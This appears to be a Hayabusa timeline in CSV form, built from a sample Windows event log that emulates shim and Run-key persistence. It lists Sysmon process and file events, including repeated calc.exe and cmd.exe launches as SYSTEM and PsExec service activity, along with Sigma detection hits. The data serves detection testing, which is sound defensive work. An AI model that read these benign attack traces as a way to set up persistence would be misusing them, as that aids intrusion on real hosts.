2019-03-20 05:41:11.719 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.759 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.909 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.919 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:11.929 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:12.931 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 365ABB72-528F-5C91-0000-0010ECB50000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 365ABB72-5290-5C91-0000-00104C100100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.563 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-52B4-5C91-0000-0010C25D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-52CE-5C91-0000-00109D740100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.454 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-52CE-5C91-0000-00106F720100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1948 | PGUID: 365ABB72-52EC-5C91-0000-001027860100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 304 | PGUID: 365ABB72-5310-5C91-0000-001096A90100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 432 | PGUID: 365ABB72-532B-5C91-0000-00100EB40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 580 | PGUID: 365ABB72-5344-5C91-0000-001032BC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1156 | PGUID: 365ABB72-5345-5C91-0000-001019C40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1280 | PGUID: 365ABB72-5366-5C91-0000-00109FCD0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1472 | PGUID: 365ABB72-5384-5C91-0000-0010F5D70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Sysmon.exe | Process: C:\Windows\Sysmon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1564 | PGUID: 365ABB72-53A2-5C91-0000-00101FE20100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1744 | PGUID: 365ABB72-53A2-5C91-0000-001093E70100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1600 | PGUID: 365ABB72-53C0-5C91-0000-001044FC0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1904 | PGUID: 365ABB72-53DE-5C91-0000-00105C050200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding | Process: C:\Windows\System32\wbem\unsecapp.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1980 | PGUID: 365ABB72-53DE-5C91-0000-00104D160200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\UI0Detect.exe | Process: C:\Windows\System32\UI0Detect.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2040 | PGUID: 365ABB72-53DF-5C91-0000-0010452D0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe SYSTEM | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2464 | PGUID: 365ABB72-53F2-5C91-0000-001081FE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2640 | PGUID: 365ABB72-5418-5C91-0000-001089390300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2684 | PGUID: 365ABB72-5418-5C91-0000-0010BF400300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2692 | PGUID: 365ABB72-5418-5C91-0000-001076420300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2756 | PGUID: 365ABB72-5418-5C91-0000-0010784B0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logon | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 2948 | PGUID: 365ABB72-543D-5C91-0000-00102FA20300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2960 | PGUID: 365ABB72-543D-5C91-0000-001099A30300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x33435 | PID: 2984 | PGUID: 365ABB72-543D-5C91-0000-001099A60300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3068 | PGUID: 365ABB72-543E-5C91-0000-001009C90300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\PSEXESVC.exe"" | Process: C:\Windows\PSEXESVC.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3080 | PGUID: 365ABB72-543E-5C91-0000-001096D00300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: msg * ""hello from run key"" | Process: C:\Windows\System32\msg.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" | LID: 0x33435 | PID: 3144 | PGUID: 365ABB72-543E-5C91-0000-001071E70300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" | Process: C:\Program Files\Windows Media Player\wmpnetwk.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 3628 | PGUID: 365ABB72-546C-5C91-0000-00106A730400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2336 | PGUID: 365ABB72-550C-5C91-0000-001063E60400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | Process: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 2704 | PGUID: 365ABB72-551C-5C91-0000-001030590500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
2019-03-20 05:46:25.856 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\System32\Tasks\Microsoft\Windows Defender\MP Scheduled Scan | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
